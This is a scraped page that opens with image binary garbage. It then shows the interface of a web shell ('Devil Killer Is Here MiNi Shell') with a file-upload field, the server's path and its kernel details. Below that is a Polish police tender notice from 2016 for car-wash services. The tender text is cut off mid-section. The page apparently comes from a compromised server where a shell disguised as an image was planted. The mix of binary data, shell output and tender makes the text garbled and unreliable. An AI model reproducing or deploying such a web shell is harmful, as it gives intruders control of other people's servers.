JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161209/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161209/363318-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.policja.waw.pl' target='_blank'>http://www.policja.waw.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 363318 - 2016
              z dnia 2016-12-09 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Warszawa: Usługi mycia i odkurzania pojazdów służbowych<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Komenda Stołeczna Policji, krajowy numer identyfikacyjny
              1212648200000, ul.
              ul. Nowolipie 
              2,
              00150  
              Warszawa, woj.
              mazowieckie, państwo
              Polska, tel.
              22 6038608. 6037691, e-mail
              zamowienia@ksp.policja.gov.pl, faks
              226 037 642.
              <br />
              Adres strony internetowej (URL): www.policja.waw.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja rządowa terenowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.policja.waw.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.policja.waw.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />oferty oraz oświadczenia sporządza się pod rygorem nieważności w formie pisemnej<br />
                Adres:
                <br />Komenda Stołeczna Policji, ul. Nowolipie 2, 00-150 Warszawa</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Usługi mycia i odkurzania pojazdów służbowych<br /><b>Numer referencyjny: </b>WZP-4962/16/259/T<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b><br />9<br /><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1. Przedmiotem zamówienia są usługi mycia zewnętrznego oraz odkurzania wnętrz pojazdów służbowych osobowych oraz typu furgon użytkowanych w jednostkach Policji realizowane w oparciu o dostarczone przez Wykonawcę karty flota lub karty płatnicze lub żetony zwane dalej "usługami
2. Usługi mycia oraz odkurzania wykonywane będą na podstawie kart do bezgotówkowej realizacji usług lub żetonów, którymi dysponować będzie kierujący pojazdem. Wykonawca zapewni karty magnetyczne lub odpowiednio oznaczone żetony  w ilości zapewniającej wykonanie usług. Żetony mogą być np. w dwóch kolorach: jeden kolor  dla usług mycia i drugi kolor  dla usług odkurzania pojazdu.
3.Usługa:
	1) mycia w obiekcie, tj. myjni automatycznej lub ręcznej (bez udziału osoby ze strony Zamawiającego) polegającej na zewnętrznym myciu nadwozi, obejmującej następujące czynności:
	a) mycie wstępne,
	b) mycie zasadnicze z użyciem środka myjącego,
	c) mycie kół pojazdu,
	d) osuszanie pojazdu;
	2) odkurzania wnętrza pojazdów w obiekcie tj. myjni automatycznej lub ręcznej polegające na udostępnieniu  stanowiska wyposażonego w odkurzacz przemysłowy, którego cykl odkurzania nie może być krótszy niż 4 minuty. Czynności związane z odkurzaniem pojazdu będzie wykonywał pracownik Zamawiającego<br /><br /><b>II.5) Główny kod CPV: </b>50112300-6<br /><b> Dodatkowe kody CPV:</b>30163000-9,
                39235000-9<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 31/12/2018<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Zamawiający żąda, by Wykonawca wykazał, że posiada zdolność techniczną  tj. dysponuje:
1) w zadaniu nr 1 - myjnią automatyczną lub ręczną posiadającą co najmniej 1 stanowisko do mycia pojazdów o wysokości min. 2,5 m, liczonej od powierzchni gruntu oraz co najmniej 1 stanowisko do odkurzania wnętrza pojazdów wyposażone w odkurzacz przemysłowy, zlokalizowaną na terenie m.st. Warszawy w dzielnic Żoliborz lub Bielany;
2) w zadaniu nr 2 - myjnią automatyczną lub ręczną posiadającą co najmniej 1 stanowisko do mycia pojazdów o wysokości min. 2,5 m, liczonej od powierzchni gruntu oraz co najmniej 1 stanowisko do odkurzania wnętrza pojazdów wyposażone w odkurzacz przemysłowy, zlokalizowaną na terenie m.st. Warszawy w dzielnic Praga Północ lub Białołęka lub Bródno lub Targówek;
3) w zadaniu nr 3 - myjnią automatyczną lub ręczną posiadającą co najmniej 1 stanowisko do mycia pojazdów o wysokości min. 2,5 m, liczonej od powierzchni gruntu oraz co najmniej 1 stanowisko do odkurzania wnętrza pojazdów wyposażone w odkurzacz przemysłowy, zlokalizowaną na terenie m.st. Warszawy w dzielnic Praga Południe;
4) w zadaniu nr 4 - myjnią automatyczną lub ręczną posiadającą co najmniej 1 stanowisko do mycia pojazdów o wysokości min. 2,5 m, liczonej od powierzchni gruntu oraz co najmniej 1 stanowisko do odkurzania wnętrza pojazdów wyposażone w odkurzacz przemysłowy, zlokalizowaną na terenie miasta/gminy w której siedzibę ma Komenda Powiatowa Policji w Mińsku Mazowieckim lub w promieniu nie większym niż 4 km od jej siedziby;
5) w zadaniu nr 5 - myjnią automatyczną lub ręczną posiadającą co najmniej 1 stanowisko do mycia pojazdów o wysokości min. 2,5 m, liczonej od powierzchni gruntu oraz co najmniej 1 stanowisko do odkurzania wnętrza pojazdów wyposażone w odkurzacz przemysłowy, zlokalizowaną na terenie miasta/gminy w której siedzibę ma Komenda Powiatowa Policji w Nowym Dworze Mazowieckim lub w promieniu nie większym niż 4 km od jej siedziby;
6) w zadaniu nr 6 - myjnią automatyczną lub ręczną posiadającą co najmniej 1 stanowisko do mycia pojazdów o wysokości min. 2,5 m, liczonej od powierzchni gruntu oraz co najmniej 1 stanowisko do odkurzania wnętrza pojazdów wyposażone w odkurzacz przemysłowy, zlokalizowaną na terenie miasta/gminy w której siedzibę ma Komenda Powiatowa Policji w Otwocku lub w promieniu nie większym niż 4 km od jej siedziby;
7) w zadaniu nr 7 - myjnią automatyczną lub ręczną posiadającą co najmniej 1 stanowisko do mycia pojazdów o wysokości min. 2,5 m, liczonej od powierzchni gruntu oraz co najmniej 1 stanowisko do odkurzania wnętrza pojazdów wyposażone w odkurzacz przemysłowy, zlokalizowaną na terenie miasta/gminy w której siedzibę ma Komenda Powiatowa Policji w Pruszkowie lub w promieniu nie większym niż 4 km od jej siedziby;
8) w zadaniu nr 8 - myjnią automatyczną lub ręczną posiadającą co najmniej 1 stanowisko do mycia pojazdów o wysokości min. 2,5 m, liczonej od powierzchni gruntu oraz co najmniej 1 stanowisko do odkurzania wnętrza pojazdów wyposażone w odkurzacz przemysłowy, zlokalizowaną na terenie miasta/gminy w której siedzibę ma Komenda Powiatowa Policji w Wołominie lub w promieniu nie większym niż 4 km od jej siedziby;
9) w zadaniu nr 9 - myjnią automatyczną lub ręczną posiadającą co najmniej 1 stanowisko do mycia pojazdów o wysokości min. 2,5 m, liczonej od powierzchni gruntu oraz co najmniej 1 stanowisko do odkurzania wnętrza pojazdów wyposażone w odkurzacz przemysłowy, zlokalizowaną na terenie miasta/gminy w której siedzibę ma Komenda Powiatowa Policji dla powiatu warszawskiego zachodniego z siedzibą w Starych Babicach lub w promieniu nie większym niż 4 km od jej siedziby<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px"></div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />Zamawiający przed udzieleniem zamówienia, wezwie Wykonawcę, którego oferta została oceniona jako najkorzystniejsza  odpowiednio do zadania, do złożenia w wyznaczonym przez Zamawiającego terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia następujących oświadczeń lub dokumentów:
- wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych Wykonawcy usług w celu realizacji zamówienia wraz z informacją o podstawie dysponowania tymi zasobami. Przez ww. wykaz Zamawiający rozumie Wykaz wyposażenia myjni samochodowej (Wzór-Załącznik  nr 4 do dokumentacji przetargowej zamieszczonej na stronie internetowej Zamawiającego<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">Wykonawca w terminie 3 dni od dnia zamieszczenia na stronie internetowej informacji, o której mowa w art. 86 ust. 5 Ustawy Pzp, przekaże Zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 Ustawy Pzp. Wraz ze złożeniem oświadczenia Wykonawca może przedstawić dowody, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena brutto</td><td>60</td></tr><tr><td>Godziny otwarcia myjni</td><td>25</td></tr><tr><td>Ilość stanowisk do mycia pojazdów</td><td>15</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
